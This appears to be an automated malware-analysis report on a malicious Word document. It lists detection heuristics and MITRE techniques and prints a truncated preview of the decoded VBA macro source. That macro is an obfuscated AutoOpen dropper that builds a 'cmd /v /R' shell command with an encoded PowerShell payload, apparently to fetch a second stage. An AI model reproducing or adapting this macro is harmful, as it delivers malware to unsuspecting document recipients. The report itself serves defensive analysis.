MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This subroutine is designed to execute a shell command, indicated by the concatenation of strings like 'md', '/', 'v', and '/R'. The intent is likely to download and execute a second-stage payload, a common technique for malware delivery.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6691555-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6691555-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13887 bytes |
SHA-256: 64a62de3f91c807460c3a96789888e36a217bf0c4d8fb845a6ed1cdfbc6be1ad |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "fIzspJDt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Error FuIla
Hour wzGJuG
Error Sin(8)
Error QIHNLA
VBA.Shell% KeyString(JEWYLiJQJ + uktfbQR + vbKeyC + kBzocMhPu + LiblRPPf) + pzPGPnMPhUInw + FhvzztVT + jYWuFbhtjQb + UnKzDWBZEv + TvKDGXDWj + wtclHM + bYsRozcNBOh + bnWbm + BIsrlTnLRtF + olmlXjBh + iJcomUoUp + MnrLMJW + BjiMYUzNVCXiud + UfVuTjvRzfEB, 748545624 - 748545624
Hour CDec(41936 / WlGVwi - 52107 - uIwRQh)
Hour Sqr(23)
End Sub
Attribute VB_Name = "AdjHsfbVoQN"
Function jYWuFbhtjQb()
On Error Resume Next
Hour CByte(5)
Hour 2
szHGsqi = "md" + " " + " " + " " + " " + "/" + "v" + " " + " " + " "
Error AdmGkX
Hour RODPK
iPzWVL = " " + " " + " " + " " + " " + " " + " " + " /" + "R " + " " + CStr(Chr(ZurjnMNibq + lPLpztrGVIiGft + 34 + azNzWtABb + jHEzHsrQvnaju)) + " "
Hour 9
Hour Hex(3427 + VYzIWk * qwTUE - BoZclS)
Error 2487
bRRBPcKr = " " + " " + "S" + "e" + "t" + " # "
Error Log(WzwETj)
Error 510
Hour BInrh
lzJfQQfnfC = " " + "=" + "p" + "@)e" + "rOh"
Hour CDbl(nEvNZ)
Error Cos(8)
hbLiXKET = "ell" + " -" + "e" + " JA" + ".:A"
Error bJwAQG
Error Sgn(673)
Eavsd = "E" + "Y" + "A6g" + "A9A" + "[4A"
Hour 959
Error CDec(lUmcn)
Hour LCase(tBivIZ)
iCcjFTFEf = "Z#." + "3A" + "C0A" + "b)" + "." + "iA" + "[@" + "AZ" + "#." + "jA"
Error CCur(mQzmj)
Hour Log(8)
ajpUnRb = "H#A" + "}" + "A.{" + "A[U" + "Ad" + "A" + "Au" + "A"
Error 62
Error Month(8930 * YBrjbB + HCdKRT / iTOIlT)
YhoHb = "Fc" + "AZ#" + ".iA" + "E" + "M" + "A" + "bA" + ".pA"
jYWuFbhtjQb = szHGsqi + iPzWVL + bRRBPcKr + lzJfQQfnfC + hbLiXKET + Eavsd + iCcjFTFEf + ajpUnRb + YhoHb
Error qiuIp
Error CDate(sdODw)
End Function
Function UnKzDWBZEv()
On Error Resume Next
Error CDbl(fSikFw)
Hour Sin(3)
ZzPpc = "[U" + "Ab" + "g.0" + "A" + "DO" + "A" + "JA."
Error 333329628
Error CDate(85857 * tBrnR - 75167 + uwKio)
Error Int(TSFAl - GOrnzm + 49848 + OEUiZ)
ELGilhiu = "p" + "AEY" + "A" + "dg" + "A9A" + "CcA" + "a" + "A" + ".0"
Hour vCbKhI
Hour Rnd(8)
PjsJqQEfPP = "AH" + "#" + "A" + "cAA" + "$A" + "C8" + "A" + "L)." + ")AH" + "M" + "A" + "e"
Hour CStr(8)
Error Sqr(PjlOt)
BnbYRz = "#.j" + "A[g" + "A" + "Z#" + "." + "kA" + "[UA" + "bA." + "pA[" + "MA" + "c)." + "vA["
Error mIldtl
Hour 465724413
Error DJzjT
uiwqZ = "MA" + "a#." + "lAH" + "#A" + "e#A" + "uA[" + "8" + "Ac" + "g." + "nA"
UnKzDWBZEv = ZzPpc + ELGilhiu + PjsJqQEfPP + BnbYRz + uiwqZ
Hour Second(jWuGc)
Error iPNpV
Hour CBool(56847 * RHMsk - HXVJiR * RivQj)
End Function
Function TvKDGXDWj()
On Error Resume Next
Error JVqTzw
Hour Fix(NKZPZw)
Error 742
sVKLzudw = "C4" + "A" + "Y" + "#.1" + "A" + "C" + "8" + "A" + "M)"
Hour IzhXa
Hour CDbl(lBuWX * OaAbDF / YMkiG / jpmYa)
Hour Sqr(87)
sTnKpJKA = ".t" + "AHc" + "A#" + "A" + ".@A" + "H#A"
Error Val(2494)
Error Month(GDzqn)
UFpFpw = "dA." + ")AD" + "@" + "A" + "L" + ")A" + "v" + "A" + "[#" + "A" + "b)." + "OA["
Error Str(705)
Hour Cos(PjDTSH)
saGMjjXww = "MAa" + "#At" + "AHA" + "AZ#" + ".jA" + "[MA" + "Y#"
Error CBool(YzdTq)
Hour 7
phLmjs = ".0" + "A" + "[k" + "A" + "Lg" + ".pA" + "H#A" + "L)." + "5AD" + "cA" + "6#A" + "5AE" + "AAa"
Error Month(HLQnc - 14447)
Hour CCur(rqJqcj + 80971)
Hour TypeName(tdBvP + RJkrS)
ZhEhBFVuE = "A.0" + "AH#" + "AcA" + "A" + "$AC" + "8" + "AL" + ").z" + "A" + "["
Error Rnd(189351509)
Hour LnFSO
Error Sin(SAzdYv - VhITd)
YkRNbb = "gAb" + ").r" + "A[" + "8" + "Ab" + ")" + ".@" + "AHM" + "A" + "Y#."
Error Fix(VaVpib)
Error jFrCH
Hour Val(7019)
DvhzfY = "uA" + "[E" + "AdA" + "Au" + "A[" + "kAc"
Error CDate(BoNpvp)
Error CDate(29754 - RuzGCm)
Error Int(45)
FjXCT = "g" + "Av" + "AH" + "U" + "Aeg" + ".D" + "A" + "E0A" + "N#." + "yAH"
Error
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.